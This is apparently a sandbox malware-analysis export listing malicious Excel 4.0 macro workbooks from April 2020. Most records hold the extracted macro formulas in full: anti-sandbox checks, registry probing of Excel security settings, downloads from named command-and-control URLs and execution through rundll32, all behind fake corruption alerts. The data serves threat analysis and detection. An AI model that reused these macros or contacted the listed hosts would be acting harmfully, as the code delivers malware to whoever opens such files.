{"version":"0.2","sample":{"sample":"","kind":"file","target":"2d9318b2f854bf4adda6fa7487bda820a2aad254768ced35d77824a480c358fd"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2d9318b2f854bf4adda6fa7487bda820a2aad254768ced35d77824a480c358fd","filesize":167936,"md5":"d0acf9c30dc1c31274b2bef5c60fa635","sha1":"45b6c703b3c1c029e702088762db7c39eb8e2af2","sha256":"2d9318b2f854bf4adda6fa7487bda820a2aad254768ced35d77824a480c358fd","sha512":"029a5a7ce788d655abf2e96994b425d06ac54a47b0e865675e3de001c45ada11c91315b1d46abb3a2261909b146123e7f9868aab0f62313a51b147e830652889","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2d9318b2f854bf4adda6fa7487bda820a2aad254768ced35d77824a480c358fd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FvibSYsX7o\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2da53bd12f34b417ee296cc20f638a83d7e087f9020b10415076f67933ae4cee"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2da53bd12f34b417ee296cc20f638a83d7e087f9020b10415076f67933ae4cee","filesize":112640,"md5":"3b9ee5bdb9500ce267d6dcf6d35b895a","sha1":"6fc2f6c9a0a422f6fb44f73a2bbd32bad3371da8","sha256":"2da53bd12f34b417ee296cc20f638a83d7e087f9020b10415076f67933ae4cee","sha512":"d1241cbd97c23c8f4a3c1af4a07942a98c3185cf829855388799c3428322909572ae60ce2dee8a9b49b1f675cb55c9e15a9b65b13f0b7f1b797fcaded5e47e5d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2da53bd12f34b417ee296cc20f638a83d7e087f9020b10415076f67933ae4cee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2db09164db45cc13c633908758cc5d5a3b84ddcc44ba4dc12c2845f716cd4a1b"},"analysis":{"reported":"2020-04-09T16:15:33Z","score":10},"files":[{"filename":"2db09164db45cc13c633908758cc5d5a3b84ddcc44ba4dc12c2845f716cd4a1b","filesize":209408,"md5":"65c0cf3402237be362d5fd6ada45ceda","sha1":"7763fda017404654717806fdaa0568e04c161c3c","sha256":"2db09164db45cc13c633908758cc5d5a3b84ddcc44ba4dc12c2845f716cd4a1b","sha512":"babe4d1b51cc83b96cbeea16fdb0de35eb71338a9eb77f382e1e264a532a5fa5457a94a5de2a696e52c43e0e54c0012b84a8c0aacd2b44ce7ddb0890870deadf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2db09164db45cc13c633908758cc5d5a3b84ddcc44ba4dc12c2845f716cd4a1b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SsQGUAQ781\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2db91b7dc28381111c5e6e1200455bd839bff829deab12b08c597c6f5a7a0ee6"},"analysis":{"reported":"2020-04-09T16:15:33Z","score":10},"files":[{"filename":"2db91b7dc28381111c5e6e1200455bd839bff829deab12b08c597c6f5a7a0ee6","filesize":209920,"md5":"e07cb893a0f3b36980e76229187edc62","sha1":"0bc99211a3b688cb5c34de45cde6123e7ac5720f","sha256":"2db91b7dc28381111c5e6e1200455bd839bff829deab12b08c597c6f5a7a0ee6","sha512":"be23a2eb011260754d3bb8c7c866a7eb4eb92d59c235930206f479e9a80d240e044299c9ca5242d0f1229c0dd2bc215cac40ea038e85873b6c10f39a73323268","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2db91b7dc28381111c5e6e1200455bd839bff829deab12b08c597c6f5a7a0ee6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3a63dlGXLY\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2dcd1ce453b731b3d6d0774b55029dd0bb0533e44d9c692047be6df15a68ab6d"},"analysis":{"reported":"2020-04-09T16:15:33Z","score":10},"files":[{"filename":"2dcd1ce453b731b3d6d0774b55029dd0bb0533e44d9c692047be6df15a68ab6d","filesize":142848,"md5":"5096f4311679acaf3519d46d66552dda","sha1":"0b572d17c2d75b906304657c7859b6f1b33c1737","sha256":"2dcd1ce453b731b3d6d0774b55029dd0bb0533e44d9c692047be6df15a68ab6d","sha512":"71e4487e1d5f677570f14e5b36f41744d36219355ddfb3914ec53d511a4865d487a6df173fb1450391364c00f7abf66cc608be139b8658c5dd6e0e6c1dfefff5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2dcd1ce453b731b3d6d0774b55029dd0bb0533e44d9c692047be6df15a68ab6d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"mXou0ppcuA\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2dcdf0ed8f0db008a398ab6eaa3fa89aca5b4b7da18e3dd9e9760d5e7a9e7f59"},"analysis":{"reported":"2020-04-09T16:15:33Z","score":10},"files":[{"filename":"2dcdf0ed8f0db008a398ab6eaa3fa89aca5b4b7da18e3dd9e9760d5e7a9e7f59","filesize":206336,"md5":"65dc30e9865ee900e6477113fbb68016","sha1":"e5d3af9c8c4338467e38e81ecad31c5d85db746e","sha256":"2dcdf0ed8f0db008a398ab6eaa3fa89aca5b4b7da18e3dd9e9760d5e7a9e7f59","sha512":"e395f363905753fca823fec862d7408b223c4d1165f87738039002936495efebb3bd44222a95f93062ef3777134a87e337b6a336bdd03d59a686f9ae6196fd1f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2dcdf0ed8f0db008a398ab6eaa3fa89aca5b4b7da18e3dd9e9760d5e7a9e7f59.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IIMQzoyMkF\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e043075192a1c394d48d132fd35d45e1ad19d6125259ddbf8b7d668bdce9253"},"analysis":{"reported":"2020-04-09T16:15:33Z","score":10},"files":[{"filename":"2e043075192a1c394d48d132fd35d45e1ad19d6125259ddbf8b7d668bdce9253","filesize":177152,"md5":"76798854cc0d9a174f2b946246d709bd","sha1":"bec2f30acccd57010c9996e2786f6acf0b651ed3","sha256":"2e043075192a1c394d48d132fd35d45e1ad19d6125259ddbf8b7d668bdce9253","sha512":"4753d87ef57664731b29aa46e72ee8a1206a53cd9f83396db90320f36c085877fb52751ca6948bc289268f2fdec00723a7f7c807ba997ff65dfb86ff041fbdb1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e043075192a1c394d48d132fd35d45e1ad19d6125259ddbf8b7d668bdce9253.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zw1S6bDDib\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e07ec0a7f2338357785a19d9c9a50aec122628b1168873556b8e36fcd368c16"},"analysis":{"reported":"2020-04-09T16:15:33Z","score":10},"files":[{"filename":"2e07ec0a7f2338357785a19d9c9a50aec122628b1168873556b8e36fcd368c16","filesize":207360,"md5":"889eb4c16df484188008cf4cba4c6673","sha1":"ef41bfccf6d155dd101783f96c0982dd13b310c1","sha256":"2e07ec0a7f2338357785a19d9c9a50aec122628b1168873556b8e36fcd368c16","sha512":"8bffa262c1d5114e86bb6be620e7068e784acb1c66ebd35575b3a1384659b584c9a40b91d9c3a411761ff0f126c7707f1051cd70c7b332502af524eac56568d3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e07ec0a7f2338357785a19d9c9a50aec122628b1168873556b8e36fcd368c16.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yECF3Ak94w\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e0d33fc6ee66508b5e5c1e7886e498005a940fd10203e5c44606cf137060e91"},"analysis":{"reported":"2020-04-09T16:15:33Z","score":10},"files":[{"filename":"2e0d33fc6ee66508b5e5c1e7886e498005a940fd10203e5c44606cf137060e91","filesize":209920,"md5":"12e88d1db836fa285235eed98b2912e7","sha1":"01f0330bd2225da33a87186d6a5fd8a0d798761a","sha256":"2e0d33fc6ee66508b5e5c1e7886e498005a940fd10203e5c44606cf137060e91","sha512":"1057b8d26693098f6eede19e10bd051ffb095038cdd66679886cd0f4024f9a09c45d70e3ed45b1a353f2a4582ca9950befc8398e1cc44e4763d95b97e02e8c5b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e0d33fc6ee66508b5e5c1e7886e498005a940fd10203e5c44606cf137060e91.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XzVSQSItQv\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e0e97707bdd12629a768703a6ba40be5585572b81a3145641ffe51da8d9f922"},"analysis":{"reported":"2020-04-09T16:15:33Z","score":10},"files":[{"filename":"2e0e97707bdd12629a768703a6ba40be5585572b81a3145641ffe51da8d9f922","filesize":160768,"md5":"c9bb4195c04108ccdd5a811caec48e80","sha1":"4d7086fe4536eab9e72a164e0968c4a1c965bcfb","sha256":"2e0e97707bdd12629a768703a6ba40be5585572b81a3145641ffe51da8d9f922","sha512":"f8f9e14cc11184368ff3163a7c76e7526c455f28a9b8961a163b5022eec4f45513214d618f7cd0b3a0805a9346189c1699b6eeab278aac13bbd5942e6e4084c8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e0e97707bdd12629a768703a6ba40be5585572b81a3145641ffe51da8d9f922.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"e4Iuo0qQZo\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e19e8cc3e9d31b06a47f29d3b44368b5f7db5b3a39514307fe76d785c24c5aa"},"analysis":{"reported":"2020-04-09T16:15:33Z","score":10},"files":[{"filename":"2e19e8cc3e9d31b06a47f29d3b44368b5f7db5b3a39514307fe76d785c24c5aa","filesize":112640,"md5":"de4bb53829f7e7c2dd8fb30acf06a313","sha1":"c4a6984f6cc023fe2205a7df0a75b25e830ef108","sha256":"2e19e8cc3e9d31b06a47f29d3b44368b5f7db5b3a39514307fe76d785c24c5aa","sha512":"e9c1ffa699b04f09e5ed8f0b8f5764c945677e7ca9c29b897387023859f0aad61ecb3734f456bce0ad9d308713a28a917d159a98f7be8be6b92d86e9e5007b32","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e19e8cc3e9d31b06a47f29d3b44368b5f7db5b3a39514307fe76d785c24c5aa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e29b81dd290099ce6f923caee3fe9a54b3d950274b1644d0f9ca9afcd6a5553"},"analysis":{"reported":"2020-04-09T16:15:33Z","score":10},"files":[{"filename":"2e29b81dd290099ce6f923caee3fe9a54b3d950274b1644d0f9ca9afcd6a5553","filesize":160768,"md5":"86250cd971dec8ddf5536e2606629938","sha1":"e64f6b755510b8baddd8fe8d6b7cae8a24ebc693","sha256":"2e29b81dd290099ce6f923caee3fe9a54b3d950274b1644d0f9ca9afcd6a5553","sha512":"c99d94a3f4d2b210b6cf7ec08787d203e81c4a0457eafe3620d1eabfc98ab880089c7b143e3e6c81153a377e105f3d3cdd63dd8f4e7c5dea6167674cc8c72033","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e29b81dd290099ce6f923caee3fe9a54b3d950274b1644d0f9ca9afcd6a5553.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0dGR98O2BG\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e2d27aa823485c01feaaf5b91988ad57a2bd8aac34ef6806ac0ae2d091549b1"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2e2d27aa823485c01feaaf5b91988ad57a2bd8aac34ef6806ac0ae2d091549b1","filesize":168448,"md5":"61577cf37d99dfd67bc26ee9fea1a5b9","sha1":"4ba911611801339414c7ccbf15a39d140e38272a","sha256":"2e2d27aa823485c01feaaf5b91988ad57a2bd8aac34ef6806ac0ae2d091549b1","sha512":"f6f78fbed98a0a02cfd38c362b418a08e3c7db9ef16f1c11e988583042bbaf3098882c209072ed148ef38febd17724a0e2712ce568e041691dcf4b15c808c430","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e2d27aa823485c01feaaf5b91988ad57a2bd8aac34ef6806ac0ae2d091549b1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eexrEtBSj6\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e3b960d8f7387670a3c7d5ecd18e1054d9b7e8fd0d2f483215c63fc69033456"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2e3b960d8f7387670a3c7d5ecd18e1054d9b7e8fd0d2f483215c63fc69033456","filesize":113664,"md5":"5f5951fd5b15ff82ef4af8407cbe2aae","sha1":"a0281dbcfb3ec461ccb3f9ee76072af57fe3c9b1","sha256":"2e3b960d8f7387670a3c7d5ecd18e1054d9b7e8fd0d2f483215c63fc69033456","sha512":"54f3eecc346d369e958a381dadc3a6e91e66e32a5668d2d837d50d00e2f2b40baa48dd3f1bba1acf4b55ec4b2afd8d8ccbe0266e1873fcc43bf7bc5fbf404eb7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e3b960d8f7387670a3c7d5ecd18e1054d9b7e8fd0d2f483215c63fc69033456.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0